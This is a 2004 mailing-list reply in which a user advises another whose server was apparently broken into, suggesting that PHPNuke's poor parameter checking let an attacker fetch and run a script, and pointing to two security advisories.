Hi Mátyás, Am Die, den 13.01.2004 schrieb Mátyás Tibor um 17:33:
I have got in /cgi-bin/ directory:
-neomail (1.26) -openwebmail (2.30) -SuSE things -sanecgi
but nothing else.
And I have Phpnuke 6.9 (?? PHP ??)
Did you check PHPNuke? I wouldn't trust this piece of software further than I can throw my Gateway bigtower case ;-) PostNuke and PHPNuke are known to be notoriously weak when it comes to security.
Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it?
Without knowing anything else I'd suspect PHPNuke to be the open door. It may contain a bug that allows to pass executable content as a parameter. This has been the case in the past very often as the developers of those two projects don't seem to be too concerned about evaluating the parameters at runtime. Have a look at this: http://www.gulftech.org/01032004.php or http://www.securitytracker.com/alerts/2003/Dec/1008562.html I really wouldn't use PostNuke or PHPNuke as there never has been any code audit seemingly since new weaknesses based on poor programming are discovered regularly. just my 0.02 euro ;-) Tobias